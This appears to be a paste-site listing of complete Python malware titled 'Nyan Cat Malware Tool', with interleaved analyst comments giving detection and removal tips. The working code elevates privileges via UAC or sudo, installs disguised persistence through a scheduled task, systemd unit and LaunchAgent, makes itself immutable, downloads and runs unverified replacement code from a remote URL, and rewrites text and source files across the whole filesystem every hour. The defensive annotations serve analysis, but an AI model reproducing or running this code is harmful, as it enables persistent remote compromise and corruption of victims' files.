WhosYourDaddySec

Nyan Cat Malware Tool

Feb 4th, 2025
Python 8.43 KB | None | 0 0
  1. #   To execute this malware, the user must first download and open the malicious file, which could be disguised as something harmless. Upon execution, the script will attempt to escalate privileges: on Windows, it will prompt the user with a User Account Control (UAC) window to allow the script to run with administrator rights; on Linux or macOS, the script will ask the user for their sudo password to gain root access. This is the only point of required interaction where the user needs to authorize the script. Once the user grants the necessary privileges, the script proceeds autonomously by replicating itself, creating persistence mechanisms (such as scheduled tasks or system services), altering text files, preventing removal, checking for updates from the attacker's server, and even restarting itself if terminated. After granting elevated privileges, no further user interaction is needed, and the malware operates silently in the background without the victim's knowledge or consent.
  2.  
  3.  
  4. import os
  5. import sys
  6. import fnmatch
  7. import logging
  8. import requests
  9. import shutil
  10. import subprocess
  11. import platform
  12. import getpass
  13. import ctypes
  14. import time
  15. import stat
  16. import psutil
  17.  
  18. GITHUB_RAW_URL = "https://raw.githubusercontent.com/YourRepo/YourProject/main/script.py"  # analyst note: placeholder repo path; check_for_updates() downloads this URL and writes the response over the running script
  19.  
  20. logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
  21.  
      # Analyst note: SELF_PATH is the on-disk location of this script. The dictionary
      # below lists, per OS, where self_replicate() copies it, so these paths double as
      # file-system indicators when triaging a host:
      #   Windows: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\system_service.exe
      #   Linux:   ~/.local/bin/system_service
      #   macOS:   ~/Library/LaunchAgents/com.system.service.plist
      # The generic "system service" naming is presumably meant to look like a
      # legitimate component; a file with one of these names in a per-user path is
      # worth checking against known-good software.
  22. SELF_PATH = os.path.abspath(__file__)
  23. PERSISTENT_LOCATIONS = {
  24.     "Windows": os.path.join(os.getenv("APPDATA"), "Microsoft", "Windows", "Start Menu", "Programs", "Startup", "system_service.exe"),
  25.     "Linux": os.path.expanduser("~/.local/bin/system_service"),
  26.     "Darwin": os.path.expanduser("~/Library/LaunchAgents/com.system.service.plist")
  27. }
  28.  
      # Glob patterns consulted by should_ignore(); files matching them are skipped
      # by the file-rewriting pass.
  29. IGNORE_PATTERNS = ["*.exe", "*.dll", "*.bin", "*.sys", "/proc/*", "/dev/*", "/sys/*", "*.iso", "*.img"]
  30.  
      # Extensions that is_text_file() accepts. Note the set covers source code and
      # structured data (.py, .cs, .java, .json, .xml, ...), so the files rewritten in
      # place include project and configuration files, not only plain text.
  31. TEXT_EXTENSIONS = {'.txt', '.csv', '.log', '.json', '.xml', '.md', '.py', '.cs', '.java', '.html', '.css', '.js'}
  32.  
  33. def check_admin():
          # Report whether the process is already elevated: on Windows the result of
          # shell32.IsUserAnAdmin() is non-zero, on other systems the effective UID is 0.
  34.     if platform.system() == "Windows":
  35.         return ctypes.windll.shell32.IsUserAnAdmin() != 0
  36.     else:
  37.         return os.geteuid() == 0
  38.  
  39. def elevate_privileges():
          # Analyst note: relaunches the script with elevated rights unless
          # check_admin() already reports elevation. Per the header comment of this
          # paste, this is the only step that needs user interaction, which makes the
          # consent prompt the main prevention point: an unexpected UAC or sudo prompt
          # for a Python interpreter should be refused and reported.
  40.     if check_admin():
  41.         logging.info("Already running with elevated privileges.")
  42.         return
  43.  
  44.     if platform.system() == "Windows":
  45.         logging.info("Requesting admin privileges...")
              # ShellExecuteW with the "runas" verb starts a new, elevated interpreter
              # (this is what raises the UAC prompt); the current process then exits.
              # Detection idea: process-creation telemetry showing the Python
              # interpreter started elevated with a script from a user-writable path.
  46.         ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
  47.         sys.exit()
  48.     else:
  49.         logging.info("Requesting sudo privileges...")
              # execvp replaces the current process with `sudo <interpreter> <argv>`,
              # so the password prompt comes from sudo itself and the attempt is
              # recorded wherever sudo logging is configured.
  50.         os.execvp("sudo", ["sudo", sys.executable] + sys.argv)
  51.  
  52. def should_ignore(file_path):
          # True when file_path matches any glob in IGNORE_PATTERNS (fnmatch semantics).
  53.     return any(fnmatch.fnmatch(file_path, pattern) for pattern in IGNORE_PATTERNS)
  54.  
  55. def is_text_file(file_path):
          # True when the lower-cased file extension is listed in TEXT_EXTENSIONS; the
          # decision is made on the name only, the file content is not inspected.
  56.     return os.path.splitext(file_path)[1].lower() in TEXT_EXTENSIONS
  57.  
  58. def normalize_line_endings(file_path):
          # Analyst note: despite the benign name, this rewrites the target file in
          # place with no backup copy. On Windows every CRLF becomes LF; on other
          # systems every CR byte becomes LF, so a CRLF pair turns into two LFs and
          # the file gains blank lines. Impact for incident response: content and
          # modification times of matching files change, so restoring from backup or
          # version control is the reliable way to recover originals.
          # Any exception is logged and swallowed, so failures on individual files
          # do not stop the caller.
  59.     try:
  60.         with open(file_path, 'rb') as f:
  61.             content = f.read()
  62.         normalized_content = content.replace(b'\r\n', b'\n') if platform.system() == "Windows" else content.replace(b'\r', b'\n')
  63.  
              # Only files whose bytes actually change are written back.
  64.         if content != normalized_content:
  65.             with open(file_path, 'wb') as f:
  66.                 f.write(normalized_content)
  67.             logging.info(f'Normalized: {file_path}')
  68.     except Exception as e:
  69.         logging.error(f'Error processing {file_path}: {e}')
  70.  
  71. def process_directory(root_dir):
          # Walks root_dir recursively and passes every file that is not excluded by
          # should_ignore() and has an extension accepted by is_text_file() to
          # normalize_line_endings(). execute_on_open() calls this with "/", i.e. the
          # whole file system reachable by the (elevated) process.
          # Detection idea: a single process opening and rewriting large numbers of
          # text/source files across unrelated directories is a strong
          # file-integrity-monitoring signal.
  72.     for dirpath, _, filenames in os.walk(root_dir):
  73.         for filename in filenames:
  74.             file_path = os.path.join(dirpath, filename)
  75.             if not should_ignore(file_path) and is_text_file(file_path):
  76.                 normalize_line_endings(file_path)
  77.  
  78. def anti_removal():
          # Analyst note: applies a file-protection attribute to the script's own
          # path (SELF_PATH) to hinder deletion: read-only on Windows, the immutable
          # attribute on Linux and macOS. Other platforms are left untouched.
  79.     system = platform.system()
  80.     if system == "Windows":
  81.         add_read_only_attribute(SELF_PATH)
  82.     elif system == "Linux" or system == "Darwin":
  83.         set_immutable_attribute(SELF_PATH)
  84.  
  85. def add_read_only_attribute(file_path):
          # Sets the file mode to stat.S_IREAD (owner read only) and logs the result;
          # errors are logged and swallowed.
          # Remediation note: this is an ordinary permission bit, so the owner or an
          # administrator can clear it before deleting the file.
  86.     try:
  87.         os.chmod(file_path, stat.S_IREAD)
  88.         logging.info(f"Set file to read-only: {file_path}")
  89.     except Exception as e:
  90.         logging.error(f"Failed to set file to read-only: {e}")
  91.  
  92. def set_immutable_attribute(file_path):
          # Runs `chattr +i <file_path>`. Because check=False, a non-zero exit status
          # from chattr is not raised, and the success message is logged either way;
          # only a failure to start the command reaches the except branch.
          # Remediation note: where the flag was applied, `lsattr` shows it and it has
          # to be cleared as root with `chattr -i` before the file can be removed.
  93.     try:
  94.         subprocess.run(["chattr", "+i", file_path], check=False)
  95.         logging.info(f"Set file as immutable: {file_path}")
  96.     except Exception as e:
  97.         logging.error(f"Failed to set immutable attribute: {e}")
  98.  
  99. def self_replicate():
           # Analyst note: installs persistence. The script copies itself to the
           # per-OS path from PERSISTENT_LOCATIONS (only if nothing exists there yet)
           # and then registers an autostart entry through the matching register_*
           # helper. Cleaning a host therefore means removing both the copied file
           # and the autostart entry (scheduled task, systemd unit or LaunchAgent).
           # All exceptions are logged and swallowed.
  100.     system = platform.system()
  101.     target_path = PERSISTENT_LOCATIONS.get(system)
  102.  
  103.     if not target_path:
  104.         logging.error("Unsupported OS for self-replication.")
  105.         return
  106.  
  107.     try:
  108.         if not os.path.exists(target_path):
  109.             shutil.copy(SELF_PATH, target_path)
  110.             logging.info(f"Self-replicated to {target_path}")
  111.        
               # Registration runs on every call, even when the copy step was skipped.
  112.         if system == "Windows":
  113.             register_windows_startup(target_path)
  114.         elif system == "Linux":
  115.             register_linux_service(target_path)
  116.         elif system == "Darwin":
  117.             register_mac_service(target_path)
  118.     except Exception as e:
  119.         logging.error(f"Self-replication failed: {e}")
  120.  
  121. def register_windows_startup(exec_path):
           # Analyst note: creates a scheduled task named "SystemService" that runs
           # exec_path at every logon with the highest available run level; /f
           # overwrites an existing task of the same name. The command's exit status
           # is ignored (check=False), so the log line below is written even if task
           # creation failed.
           # Detection: process-creation events for schtasks.exe with /create and
           # /rl highest, or a task of this name whose action points into a user's
           # Startup folder. Removal: `schtasks /delete /tn "SystemService" /f`.
  122.     task_name = "SystemService"
  123.     command = f'schtasks /create /tn "{task_name}" /tr "{exec_path}" /sc onlogon /rl highest /f'
  124.     subprocess.run(command, shell=True, check=False)
  125.     logging.info(f"Windows startup task '{task_name}' registered.")
  126.  
  127. def register_linux_service(exec_path):
           # Analyst note: writes a systemd unit to
           # /etc/systemd/system/system_service.service that starts exec_path, restarts
           # it whenever it exits (Restart=always) and runs it as the user returned by
           # getpass.getuser(); the unit is then enabled and started. The systemctl
           # exit codes are ignored (check=False).
           # Detection: a new unit file with this name, or a unit whose ExecStart
           # points into a home directory. Removal: `systemctl disable --now
           # system_service`, delete the unit file, then `systemctl daemon-reload`.
  128.     service_path = "/etc/systemd/system/system_service.service"
  129.     service_content = f"""
  130. [Unit]
  131. Description=System Service
  132. After=network.target
  133.  
  134. [Service]
  135. ExecStart={exec_path}
  136. Restart=always
  137. User={getpass.getuser()}
  138. StandardOutput=journal
  139.  
  140. [Install]
  141. WantedBy=multi-user.target
  142.    """
  143.     try:
  144.         with open(service_path, "w") as f:
  145.             f.write(service_content)
  146.         subprocess.run(["systemctl", "enable", "system_service"], check=False)
  147.         subprocess.run(["systemctl", "start", "system_service"], check=False)
  148.         logging.info("Linux systemd service registered.")
  149.     except Exception as e:
  150.         logging.error(f"Failed to register systemd service: {e}")
  151.  
  152. def register_mac_service(exec_path):
           # Analyst note: writes a LaunchAgent property list to the macOS path from
           # PERSISTENT_LOCATIONS (label "com.system.service", RunAtLoad true, program
           # argument exec_path) and loads it with launchctl. The launchctl exit code
           # is ignored (check=False); file-write errors are logged and swallowed.
           # Detection: a new plist with this label under ~/Library/LaunchAgents.
           # Removal: `launchctl unload <plist path>` and delete the plist.
  153.     plist_path = PERSISTENT_LOCATIONS["Darwin"]
  154.     plist_content = f"""
  155. <?xml version="1.0" encoding="UTF-8"?>
  156. <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  157. <plist version="1.0">
  158. <dict>
  159.    <key>Label</key>
  160.    <string>com.system.service</string>
  161.    <key>ProgramArguments</key>
  162.    <array>
  163.        <string>{exec_path}</string>
  164.    </array>
  165.    <key>RunAtLoad</key>
  166.    <true/>
  167. </dict>
  168. </plist>
  169.    """
  170.     try:
  171.         with open(plist_path, "w") as f:
  172.             f.write(plist_content)
  173.         subprocess.run(["launchctl", "load", plist_path], check=False)
  174.         logging.info("macOS LaunchAgent registered.")
  175.     except Exception as e:
  176.         logging.error(f"Failed to register LaunchAgent: {e}")
  177.  
  178. def prevent_process_termination():
           # Analyst note: every 10 seconds this enumerates running processes with
           # psutil and, if the PID recorded at entry is not among them, re-executes
           # the interpreter with the original arguments. Errors are logged and
           # swallowed. No call to this function appears in the visible listing.
  179.     pid = os.getpid()
  180.     try:
  181.         while True:
  182.             if pid not in [p.info['pid'] for p in psutil.process_iter(['pid', 'name'])]:
  183.                 logging.info("Process terminated, restarting...")
  184.                 os.execv(sys.executable, [sys.executable] + sys.argv)
  185.             time.sleep(10)
  186.     except Exception as e:
  187.         logging.error(f"Error in process termination prevention: {e}")
  188.  
  189. def check_for_updates():
           # Analyst note: remote self-update. The script fetches GITHUB_RAW_URL
           # (5-second timeout) and, on HTTP 200, compares the body with its own file
           # content; if they differ it overwrites SELF_PATH with the download and
           # re-executes itself. There is no signature or hash check, so whoever
           # controls the URL decides what code runs next on the host, at whatever
           # privilege this process holds.
           # Detection: outbound HTTPS to raw.githubusercontent.com from a background
           # Python process, followed by that process rewriting its own script file.
           # Containment: blocking the specific repository URL stops the update path
           # but not the copy already installed.
  190.     try:
  191.         response = requests.get(GITHUB_RAW_URL, timeout=5)
  192.         if response.status_code == 200:
  193.             new_script = response.text
  194.             if new_script.strip() != open(SELF_PATH, "r").read().strip():
  195.                 with open(SELF_PATH, "w") as f:
  196.                     f.write(new_script)
  197.                 logging.info("Updated successfully. Restarting...")
  198.                 os.execv(sys.executable, [sys.executable] + sys.argv)
  199.     except Exception as e:
  200.         logging.error(f"Update check failed: {e}")
  201.  
  202. def execute_on_open():
           # Analyst note: entry point and overall behaviour chain, in order:
           #   1. request elevation unless already elevated,
           #   2. copy the script to the persistence path and register autostart,
           #   3. set a protection attribute on the script file,
           #   4. check the remote URL for a replacement script,
           #   5. loop forever: rewrite matching text files under "/" and sleep an hour.
           # The hourly full-tree walk gives a periodic burst of file reads/writes that
           # can be correlated in endpoint telemetry. Any exception escaping the chain
           # is logged and ends the function.
  203.     try:
  204.         logging.info("Executing script upon open.")
               # Short-circuit form: elevate_privileges() runs only when check_admin()
               # returns False.
  205.         check_admin() or elevate_privileges()
  206.         self_replicate()
  207.         anti_removal()
  208.         check_for_updates()
  209.  
  210.         while True:
  211.             logging.info("Scanning system for text files to normalize...")
  212.             process_directory("/")
  213.             logging.info("Normalization cycle complete. Sleeping for an hour...")
  214.             time.sleep(3600)
  215.  
  216.     except Exception as e:
  217.         logging.error(f"Error during execution: {e}")
  218.  
  219. if __name__ == "__main__":
           # Runs the full behaviour chain as soon as the file is executed directly;
           # importing the module does not start the chain.
  220.     execute_on_open()